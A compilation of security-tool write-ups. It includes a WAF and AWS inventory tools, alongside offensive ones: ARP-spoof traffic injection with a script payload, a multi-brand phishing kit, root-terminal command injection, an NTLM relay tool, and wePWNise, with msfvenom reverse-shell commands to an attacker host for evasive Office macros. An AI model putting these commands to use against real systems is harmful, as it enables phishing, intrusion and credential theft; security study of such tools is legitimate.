    Build Regex
    Create a regular expression from the currently selected session's source code. This action opens up a regex website and the URI is already in the clipboard, ready to be pasted into the query field.

    Calculate MD5/SHA256 hash
    Gets the current session's body and computes its hash.

    Hybrid Analysis / VirusTotal lookup
    Computes the hash of the current session's body, then looks up that hash.

    Extract to Disk
    Downloads the currently selected session(s)' body to disk, into the 'Artifacts' folder.

    Extract IOCs
    Copies into memory basic information from selected sessions so that they can be shared as IOCs.

    Connect-the-dots
    Allows you to identify the sequence of events between sessions. Right-click on the session whose steps you want to retrace and simply 'connect the dots'. It will label the sequence of events from 01 to n within the comments column. You can sort that column to get a condensed view of the sequence.

    Crawler
    Load a list of URLs from a text file and let the browser automatically visit them: Tools -> Crawler (experimental) -> Start crawler. This may require some tweaks in your browser's settings, in particular with regard to crash recovery:
    • IE: not needed
    • Firefox: in about:config, set toolkit.startup.max_resumed_crashes to -1
    • Chrome: not needed
    • Edge: fix already included

    Uninstalling EKFiddle
    Delete CustomRules.cs


    Raptor WAF v0.5 - Web Application Firewall using DFA


    Raptor is a web application firewall written in C that uses DFAs (deterministic finite automata) to block SQL injection, cross-site scripting and path traversal.

    To run:
    $ git clone https://github.com/CoolerVoid/raptor_waf
    $ cd raptor_waf; make; bin/raptor

    #Note: Don't execute with "cd bin; ./raptor"; use the full path "bin/raptor". See details at https://github.com/CoolerVoid/raptor_waf/issues/4
    The pcre library is needed to compile.

    Example
    Bring up an HTTPd server on port 80 and redirect it through Raptor on port 8883:
    $ bin/Raptor -h localhost -p 80 -r 8883 -w 4 -o loglog.txt

    Copy the vulnerable PHP code to your web server directory:
    $ cp doc/test_dfa/test.php /var/www/html

    Now you can test XSS attacks at http://localhost:8883/test.php
    Another option is to run with regexes (see the file config/regex_rules.txt to edit the rules):
    $ bin/Raptor -h 127.0.0.1 -p 80 -r 8883 -w 0 -o resultwaf -m pcre

    See the docs:
    https://github.com/CoolerVoid/raptor_waf/blob/master/doc/raptor.pdf

    More: http://funguscodes.blogspot.com/


    Polymorph - A Real-Time Network Packet Manipulation Framework With Support For Almost All Existing Protocols


    Polymorph is a framework written in Python 3 that allows the modification of network packets in real time, providing maximum control to the user over the contents of the packet. This framework is intended to provide an effective solution for real-time modification of network packets that implement practically any existing protocol, including private protocols that do not have a public specification. In addition to this, one of its main objectives is to provide the user with the maximum possible control over the contents of the packet and with the ability to perform complex processing on this information.

    Installation

    Download and installation on Linux
    Polymorph is specially designed to be installed and run on a Linux operating system, such as Kali Linux. Before installing the framework, the following requirements must be installed:
    apt-get install build-essential python-dev libnetfilter-queue-dev tshark tcpdump python3-pip wireshark
    After the installation of the dependencies, the framework itself can be installed with the Python pip package manager in the following way:
    pip3 install polymorph

    Docker environment
    From the project root:
    docker-compose up -d
    To access any of the machines of the environment:
    docker exec -ti [polymorph | alice | bob] bash

    Using Polymorph
    The Polymorph framework is composed of two main interfaces:
    • Polymorph: a command console interface. It is the main interface, and it is recommended for complex tasks such as modifying complex protocols on the fly, changing the types of template fields, or modifying protocols without a public specification.
    • Phcli: the command line interface of the Polymorph framework. It is recommended for tasks such as modifying simple protocols or executing previously generated templates.

    Using the Polymorph main interface
    For examples and documentation please refer to:

    Using the Phcli

    Dissecting almost any network protocol
    Let's start by seeing how Polymorph dissects the fields of different network protocols; it will be useful to refer to them if we want to modify any of these fields in real time. You can try any protocol that comes to mind.
    • HTTP protocol, show only the HTTP layer and the fields belonging to it.
    # phcli --protocol http --show-fields
    • Show the full HTTP packet and the fields belonging to it.
    # phcli --protocol http --show-packet
    You can also apply filters to network packets; for example, you can indicate that only those containing a certain string or number are displayed.
    # phcli -p dns --show-fields --in-pkt "phrack"
    # phcli -p icmp --show-packet --in-pkt "84" --type "int"
    • You can also concatenate filters.
    # phcli -p http --show-packet --in-pkt "phrack;GET;issues"
    # phcli -p icmp --show-packet --in-pkt "012345;84" --type "str;int"
    • You can filter by the name of the fields that the protocol contains, but bear in mind that this name is the one that Polymorph provides when it dissects the network packet.
    # phcli -p icmp --show-packet --field "chksum"
    • You can also concatenate fields.
    # phcli -p mqtt --show-packet --field "topic;msg"

    Modifying network packets in real time
    Now that we know the Polymorph representation of the network packet that we want to modify, we will see how to modify it in real time.
    Let's start with some examples. All the filters explained during the previous section can also be applied here.
    # phcli -p http --field "request_uri" --value "/issues/61/1.html" --in-pkt "/issues/40/1.html;GET"
    • The previous command will work if we are in the middle of the communication between a machine and the gateway. The user will probably want to establish themselves in the middle; for this they can use ARP spoofing.
    # phcli --spoof arp --target 192.168.1.20 --gateway 192.168.1.1 -p http -f "request_uri" -v "/issues/61/1.html" --in-pkt "/issues/40/1.html;GET"
    • Or maybe the user wants to try it on localhost; for that they only have to modify the iptables rule that Polymorph establishes by default.
    # phcli -p http -f "request_uri" -v "/issues/61/1.html" --in-pkt "/issues/40/1.html;GET" -ipt "iptables -A OUTPUT -j NFQUEUE --queue-num 1"
    It may be the case that the user wants to modify a set of bytes of a network packet that has not been interpreted as a field by Polymorph. For this, you can directly access the packet bytes using a slice. (Remember to add the iptables rule if you try this on localhost.)
    # phcli -p icmp --bytes "50:55" --value "hello" --in-pkt "012345"
    # phcli -p icmp -b "\-6:\-1" --value "hello" --in-pkt "012345"
    # phcli -p tcp -b "\-54:\-20" -v '"><script>alert("hacked")</script>' --in-pkt "</html>"

    Adding complex processing in real time
    In certain situations it is possible that the PHCLI options are not enough to perform a certain action. For this, the framework implements the concept of conditional functions, which are functions written in Python that will be executed on the network packet that is intercepted in real time.
    • Conditional functions have the following format:
    def precondition(packet):
        # Processing on the packet intercepted in real time
        return packet
    • As a simple example, we are going to print the raw bytes of the packets that we intercept. (Remember to add the iptables rule if you try this on localhost.)
    def execution(packet):
        print(packet.get_payload())
        return None

    # phcli -p icmp --executions execution.py -v "None"
    For more information about the power of the conditional functions, refer to:

    Release Notes
    release-notes-1.0.0
    release-notes-1.0.3

    Contact
    shramos@protonmail.com


    BlackEye - The Most Complete Phishing Tool, With 32 Templates +1 Customizable


    BLACKEYE is an upgrade of the original ShellPhish tool (https://github.com/thelinuxchoice/shellphish) by thelinuxchoice, under the GNU license. It is the most complete phishing tool, with 32 templates + 1 customizable.
    WARNING: IT ONLY WORKS ON LAN! This tool was made for educational purposes!

    Phishing Pages generated by An0nUD4Y (https://github.com/An0nUD4Y):
    Instagram

    Phishing Pages generated by Social Fish tool (UndeadSec) (https://github.com/UndeadSec/SocialFish):
    Facebook, Google, SnapChat, Twitter, Microsoft

    Phishing Pages generated by @suljot_gjoka (https://github.com/whiteeagle0/blackeye):
    PayPal, eBay, CryptoCurrency, Verizon, DropBox, Adobe ID, Shopify, Messenger, Twitch, Myspace, Badoo, VK, Yandex, devianART

    Legal disclaimer:
    Usage of BlackEye for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

    Usage:
    git clone https://github.com/thelinuxchoice/blackeye
    cd blackeye
    bash blackeye.sh


    Rootstealer - X11 Trick To Inject Commands On Root Terminal


    This is a simple example of a new attack using X11: a program that detects when a Linux user opens a terminal as root and injects intrusive commands into that terminal with the X11 library.

    Video of Proof of concept
    This video demonstrates using the rootstealer tool to spy on all GUI window interactions and inject commands only into root terminals. This approach is useful when an attacker needs to send a malicious program to prove that a user is vulnerable to social engineering. Forcing commands into a root terminal with the X11 library is an exotic way to show the diversity of weak points.


    Install
    # apt-get install libX11-dev libxtst-dev
    # cd rootstealer/sendkeys;
    Edit the file rootstealer/cmd.cfg and write the command you want to inject.
    Now run the following:
    # make; cd ..    #back to the rootstealer/ path
    # pip install gi
    or
    # pip install gir
    Run the Python script to spy on all GUI windows, searching for a window with the "root@" string in its title:
    $ python rootstealer.py &
    Note: If you prefer full C code, for simple binary purposes, you can use rootstealer.c:
    $ sudo apt-get install libwnck-dev
    $ gcc -o rootstealer rootstealer.c `pkg-config --cflags --libs libwnck-1.0` -DWNCK_I_KNOW_THIS_IS_UNSTABLE -DWNCK_COMPILATION
    $ ./rootstealer &
    Done; see the video demo. Rootstealer forces commands only on root terminals.

    Mitigation
    Don't trust anyone. https://www.esecurityplanet.com/views/article.php/3908881/9-Best-Defenses-Against-Social-Engineering-Attacks.htm
    Whenever you log in as root, change the window title:
    # gnome-terminal --title="SOME TITLE HERE"
    This simple action can prevent this attack.

    Tests
    Tested on Xubuntu 16.04


    Resource-Counter - This Command Line Tool Counts The Number Of Resources In Different Categories Across Amazon Regions


    This command line tool counts the number of resources in different categories across Amazon regions.
    This is a simple Python app that will count resources across different regions and display them on the command line. It first shows the dictionary of the results for the monitored services on a per-region basis, then it shows totals across all regions in a friendlier format. It tries to use the most-efficient query mechanism for each resource in order to manage the impact of API activity. I wrote this to help me scope out assessments and know where resources are in a target account.
    The development plan is to upgrade the output (probably to CSV file) and to continue to add services. If you have a specific service you want to see added just add a request in the comments.

    The current list includes:
    • Application and Network Load Balancers
    • Autoscale Groups
    • Classic Load Balancers
    • CloudTrail Trails
    • Cloudwatch Rules
    • Config Rules
    • Dynamo Tables
    • Elastic IP Addresses
    • Glacier Vaults
    • IAM Groups
    • Images
    • Instances
    • KMS Keys
    • Lambda Functions
    • Launch Configurations
    • NAT Gateways
    • Network ACLs
    • IAM Policies
    • RDS Instances
    • IAM Roles
    • S3 Buckets
    • SAML Providers
    • SNS Topics
    • Security Groups
    • Snapshots
    • Subnets
    • IAM Users
    • VPC Endpoints
    • VPC Peering Connection
    • VPCs
    • Volumes

    Usage:
    To install, just copy it where you want it and install the requirements:
    pip install -r ./requirements.txt
    This was written in Python 3.6.
    To run:
    python count_resources.py 
    By default, it will use whatever AWS credentials are already configured on the system. You can also specify an access key/secret at runtime; this is not stored. It only needs read permissions for the listed services; I use the ReadOnlyAccess managed policy, but you should also be able to use the SecurityAudit policy.
    Usage: count_resources.py [OPTIONS]

    Options:
    --access TEXT AWS Access Key. Otherwise will use the standard credentials
    path for the AWS CLI.
    --secret TEXT AWS Secret Key
    --profile TEXT If you have multiple credential profiles, use this option to
    specify one.
    --help Show this message and exit.
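    For example, to count resources using a named credential profile:
    python count_resources.py --profile dev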

    Sample Output:
    Establishing AWS session using the profile- dev Current account ID: xxxxxxxxxx Counting resources across regions. This will take a few minutes...
    Resources by region {'ap-northeast-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'ap-northeast-2': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 2, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'ap-south-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 2, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'ap-southeast-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'ap-southeast-2': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'ca-central-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 2, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'eu-central-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier 
vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'eu-west-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'eu-west-2': {'instances': 3, 'volumes': 3, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'eu-west-3': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'sa-east-1': {'instances': 0, 'volumes': 0, 'security_groups': 1, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'us-east-1': {'instances': 2, 'volumes': 2, 'security_groups': 19, 'snapshots': 0, 'images': 0, 'vpcs': 2, 'subnets': 3, 'peering connections': 0, 'network ACLs': 2, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 1, 'cloudtrail trails': 2, 'sns topics': 3, 'kms keys': 5, 'dynamo tables': 0, 'rds instances': 0}, 'us-east-2': {'instances': 0, 'volumes': 0, 'security_groups': 2, 'snapshots': 0, 'images': 0, 'vpcs': 1, 'subnets': 3, 'peering connections': 0, 'network ACLs': 1, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 0, 'dynamo tables': 0, 'rds instances': 0}, 'us-west-1': {'instances': 1, 'volumes': 3, 'security_groups': 14, 'snapshots': 1, 'images': 0, 'vpcs': 0, 'subnets': 0, 'peering connections': 0, 'network ACLs': 0, 'elastic IPs': 0, 'NAT gateways': 0, 'VPC Endpoints': 0, 'autoscale groups': 0, 'launch configurations': 0, 'classic load 
balancers': 0, 'application and network load balancers': 0, 'lambdas': 0, 'glacier vaults': 0, 'cloudwatch rules': 0, 'config rules': 0, 'cloudtrail trails': 1, 'sns topics': 0, 'kms keys': 1, 'dynamo tables': 0, 'rds instances': 0}, 'us-west-2': {'instances': 9, 'volumes': 29, 'security_groups': 76, 'snapshots': 171, 'images': 104, 'vpcs': 7, 'subnets': 15, 'peering connections': 1, 'network ACLs': 8, 'elastic IPs': 7, 'NAT gateways': 1, 'VPC Endpoints': 0, 'autoscale groups': 1, 'launch configurations': 66, 'classic load balancers': 1, 'application and network load balancers': 2, 'lambdas': 10, 'glacier vaults': 1, 'cloudwatch rules': 8, 'config rules': 1, 'cloudtrail trails': 1, 'sns topics': 6, 'kms keys': 7, 'dynamo tables': 1, 'rds instances': 0}}
    Resource totals across all regions:
    Application and Network Load Balancers: 2
    Autoscale Groups: 1
    Classic Load Balancers: 1
    CloudTrail Trails: 16
    Cloudwatch Rules: 8
    Config Rules: 2
    Dynamo Tables: 1
    Elastic IP Addresses: 7
    Glacier Vaults: 1
    Groups: 12
    Images: 104
    Instances: 15
    KMS Keys: 13
    Lambda Functions: 10
    Launch Configurations: 66
    NAT Gateways: 1
    Network ACLs: 22
    Policies: 15
    RDS Instances: 0
    Roles: 40
    S3 Buckets: 31
    SAML Providers: 1
    SNS Topics: 9
    Security Groups: 122
    Snapshots: 172
    Subnets: 51
    Users: 14
    VPC Endpoints: 0
    VPC Peering Connections: 1
    VPCs: 21
    Volumes: 37
    Total resources: 796


    Aws_Public_Ips - Fetch All Public IP Addresses Tied To Your AWS Account


    aws_public_ips is a tool to fetch all public IP addresses (both IPv4/IPv6) associated with an AWS account.
    It can be used as a library and as a CLI, and supports the following AWS services (all with both Classic & VPC flavors):
    • APIGateway
    • CloudFront
    • EC2 (and as a result: ECS, EKS, Beanstalk, Fargate, Batch, & NAT Instances)
    • ElasticSearch
    • ELB (Classic ELB)
    • ELBv2 (ALB/NLB)
    • Lightsail
    • RDS
    • Redshift

    If a service isn't listed (S3, ElastiCache, etc.), it most likely has nothing to report (e.g. the service may not be publicly deployable, or all of its IP addresses may resolve to shared AWS infrastructure).
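    For a sense of the kind of work the tool does per service, here is a minimal Python sketch (illustrative only, not the gem's actual Ruby implementation) that enumerates EC2 public IPv4 and IPv6 addresses with boto3, assuming default credentials and a configured region:

    import boto3

    def ec2_public_ips():
        """Collect public IPv4/IPv6 addresses of EC2 instances in one region."""
        ips = []
        ec2 = boto3.client("ec2")
        for page in ec2.get_paginator("describe_instances").paginate():
            for reservation in page["Reservations"]:
                for instance in reservation["Instances"]:
                    # Public IPv4 address, if the instance has one
                    if "PublicIpAddress" in instance:
                        ips.append(instance["PublicIpAddress"])
                    # IPv6 addresses hang off the network interfaces
                    for eni in instance.get("NetworkInterfaces", []):
                        for ipv6 in eni.get("Ipv6Addresses", []):
                            ips.append(ipv6["Ipv6Address"])
        return ips

    if __name__ == "__main__":
        print("\n".join(ec2_public_ips()))

    aws_public_ips repeats this pattern across every supported service, which is why the gem itself is the more convenient option.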

    Quick start
    Install the gem and run it:
    $ gem install aws_public_ips

    # Uses default ~/.aws/credentials
    $ aws_public_ips
    52.84.11.13
    52.84.11.83
    2600:9000:2039:ba00:1a:cd27:1440:93a1
    2600:9000:2039:6e00:1a:cd27:1440:93a1

    # With a custom profile
    $ AWS_PROFILE=production aws_public_ips
    52.84.11.159

    CLI reference
    $ aws_public_ips --help
    Usage: aws_public_ips [options]
    -s, --services <s1>,<s2>,<s3> List of AWS services to check. Available services: apigateway,cloudfront,ec2,elasticsearch,elb,elbv2,lightsail,rds,redshift. Defaults to all.
    -f, --format <format> Set output format. Available formats: json,prettyjson,text. Defaults to text.
    -v, --[no-]verbose Enable debug/trace output
    --version Print version
    -h, --help Show this help message
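    For example, an illustrative invocation built from the flags above, limiting the check to EC2 and ELB and emitting JSON:
    $ aws_public_ips -s ec2,elb -f json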

    Configuration
    For authentication aws_public_ips uses the default aws-sdk-ruby configuration, meaning that the following are checked in order:
    1. Environment variables:
    • AWS_ACCESS_KEY_ID
    • AWS_SECRET_ACCESS_KEY
    • AWS_REGION
    • AWS_PROFILE
    2. Shared credentials files:
    • ~/.aws/credentials
    • ~/.aws/config
    3. Instance profile via metadata endpoint (if running on EC2, ECS, EKS, or Fargate)
    For more information see the AWS SDK documentation on configuration.

    IAM permissions
    To find the public IPs from all AWS services, the minimal policy needed by your IAM user is:
    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Action": [
            "apigateway:GET",
            "cloudfront:ListDistributions",
            "ec2:DescribeInstances",
            "elasticloadbalancing:DescribeLoadBalancers",
            "lightsail:GetInstances",
            "lightsail:GetLoadBalancers",
            "rds:DescribeDBInstances",
            "redshift:DescribeClusters"
          ],
          "Resource": "*"
        }
      ]
    }

    Contact
    Feel free to tweet or direct message: @arkadiyt


    wePWNise - Generates Architecture Independent VBA Code To Be Used In Office Documents Or Templates And Automates Bypassing Application Control And Exploit Mitigation Software


    wePWNise is a proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind, targeting locked-down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations, and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit, Cobalt Strike) and also accepts any custom payload in raw format.

    Prerequisites
    • Python termcolor package. To install run: pip install termcolor

    Command line arguments

    To start using wePWNise, first take a look at the options it supports:
    usage: wepwnise.py [-h] -i86 <x86_shellcode> -i64 <x64_shellcode> [--inject64]   
    [--out <output_file>] [--msgbox] [--msg <window_message>]

    optional arguments:
    -h, --help show this help message and exit
    -i86 <x86_shellcode> Input x86 raw shellcode
    -i64 <x64_shellcode> Input x64 raw shellcode
    --inject64 Inject into 64 Bit. Set to False when delivering x86
    payloads only. Default is True
    --out <output_file> File to output the VBA macro to
    --msgbox Present messagebox to prevent automated analysis.
    Default is True.
    --msg <window_message>
    Custom message to present the victim if --msgbox is
    set to True
    wePWNise requires both 32-bit and 64-bit raw payloads so that it can deliver the appropriate type when it lands on an unknown target. However, if only the x86 architecture is targeted, a dummy 64-bit payload must be provided to replace the missing code.
    To defeat certain automated analysis configurations, a message box opens upon execution of the code. The text of the message box can be altered via the --msg parameter. To disable this functionality, set the --msgbox parameter to False.
    Because long SRP/EMET policies can degrade performance, wePWNise reads two configuration files (binary-paths.txt and directory-paths.txt) containing executables and directories that are checked first, as they are less likely to be monitored. By editing the contents of those files, users can define their own choices. If the files are empty, wePWNise reads the SRP/EMET policies directly from the Registry and makes its injection choice purely based on the retrieved information.
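    For illustration, binary-paths.txt could contain one absolute executable path per line (hypothetical entries; consult the files shipped with the tool for the actual format):
    C:\Windows\System32\notepad.exe
    C:\Program Files\Internet Explorer\iexplore.exe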

    Usage examples

    The following sections describe some basic usage examples of wePWNise.

    Metasploit payloads

    First, generate the payloads for both x86 and x64 architectures in raw format and ensure that the Metasploit listeners are configured appropriately.
    $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -o /payloads/msf86.raw
    $ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker_ip> LPORT=<port> -f raw -a x86_64 -o /payloads/msf64.raw
    Then point wePWNise to the generated payloads and direct the output to msf_wepwn.txt
    $ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt

    Cobalt Strike payloads

    To generate a raw payload in Cobalt Strike, navigate to the following menu and from the Output dropdown select the Raw format. Repeat the process and enable the x64 checkbox to produce a 64-bit payload.
    Attacks > Packages > Payload Generator
    Enter the generated payloads into wePWNise to generate the VBA code.
    $ wepwnise.py -i86 /payloads/cs86.raw -i64 /payloads/cs64.raw --msgbox False --out /payloads/cs_wepwn.txt

    Custom payloads

    In certain cases only an x86 payload may be available. As wePWNise expects both 32-bit and 64-bit payloads, to disable 64-bit injection create a dummy 64-bit file and set the --inject64 parameter to False.
    $ echo "+" > /payloads/dummy64.raw
    $ wepwnise.py -i86 /payloads/custom.raw -i64 /payloads/dummy64.raw --inject64 False --out /payloads/wepwn86.txt
    Similarly, to generate 64-bit payloads only, create a dummy x86 file and supply it via wePWNise's -i86 command line parameter.
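    For example (hypothetical file names, mirroring the x86-only case above):
    $ echo "+" > /payloads/dummy86.raw
    $ wepwnise.py -i86 /payloads/dummy86.raw -i64 /payloads/custom64.raw --out /payloads/wepwn64.txt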


    WAF Buster - Disrupt WAF By Abusing SSL/TLS Ciphers


    Disrupt WAF by abusing SSL/TLS Ciphers

    About WAF_buster
    This tool was created to analyze the ciphers supported by the Web Application Firewall (WAF) in front of a web server (reference: https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html). It works by first running SslScan to enumerate all ciphers the web server supports during SSL/TLS negotiation. With that list of supported ciphers, it then uses Curl to query the web server with each cipher, checking which ciphers are unsupported by the WAF but supported by the web server. If any such cipher is found, the message "Firewall is bypassed" is displayed.
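    A minimal Python sketch of the same approach (assuming the sslscan and curl binaries are installed; the target URL is a placeholder, and this is not the tool's actual code):

    import subprocess

    target = "https://example.com"  # placeholder target

    # 1. Enumerate ciphers the server accepts during the SSL/TLS handshake.
    scan = subprocess.run(["sslscan", "--no-colour", target],
                          capture_output=True, text=True)
    accepted = [line.split()[4] for line in scan.stdout.splitlines()
                if line.strip().startswith("Accepted")]

    # 2. Re-request the page with each cipher; a successful response using a
    #    cipher the WAF cannot handle suggests the firewall can be bypassed.
    for cipher in accepted:
        probe = subprocess.run(
            ["curl", "-s", "-o", "/dev/null", "-w", "%{http_code}",
             "--ciphers", cipher, target],
            capture_output=True, text=True)
        if probe.stdout == "200":
            print("Firewall is bypassed with cipher: %s" % cipher)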


    Installation
    git clone https://github.com/viperbluff/WAF_buster.git

    Python2
    This tool was created using Python 2 and uses the following modules:
    • requests
    • os
    • sys
    • subprocess

    Usage
    Open a terminal and run:
    python2 WAF_buster.py --input




    NtlmRelayToEWS - Ntlm Relay Attack To Exchange Web Services


    ntlmRelayToEWS is a tool for performing NTLM relay attacks on Exchange Web Services (EWS). It spawns an SMBListener on port 445 and an HTTPListener on port 80, waiting for incoming connections from the victim. Once the victim connects to one of the listeners, an NTLM negotiation occurs and is relayed to the target EWS server.
    Obviously this tool does NOT implement the whole EWS API; only a handful of services that can be useful in some attack scenarios are implemented. I might add more in the future. See the 'usage' section to get an idea of which EWS calls are implemented.

    Limitations and Improvements
    Exchange version:
    I've tested this tool against an Exchange Server 2010 SP2 only (which is quite old, admittedly), so all EWS SOAP request templates, as well as the parsing of the EWS responses, are only tested for this version of Exchange. Although I haven't tested it myself, some have reported this tool also works against an Exchange 2016 server out of the box (i.e. without any changes to the SOAP request templates).
    In case those SOAP requests don't work on another version of Exchange, it is pretty easy to create SOAP request templates matching a newer version by using the Microsoft EWS Managed API in trace mode and capturing the proper SOAP requests (that's how I did it!).
    EWS SOAP client:
    I would have loved to use a SOAP client in order to get a proper interface for automatically creating all SOAP requests based on the Exchange WSDL. I tried using 'zeep', but I banged my head against the wall getting it to work with the Exchange WSDL, as it requires downloading external namespaces and as such needs an internet connection. Also, with 'zeep', the use of a custom transport session requires a Requests session, which is not the type of HTTP(S) session we have by default with the HTTPClientRelay: it would have required either refactoring the HTTPClientRelay to use 'Requests' (/me lazy) or simply having zeep create the messages with zeep.client.create_message() and sending them with the relayed session we already have. Or is it because I'm a lame developer? Oh well...

    Prerequisites
    ntlmRelayToEWS requires a proper/clean install of Impacket. So follow their instructions to get a working version of Impacket.

    Usage
    ntlmRelayToEWS implements the following attacks, which are all made on behalf of the relayed user (victim).
    Refer to the help to get additional info: ./ntlmRelayToEWS -h. Get more debug information using the --verbose or -v flag.
    sendMail
    Sends an HTML formed e-mail to a list of destinations:
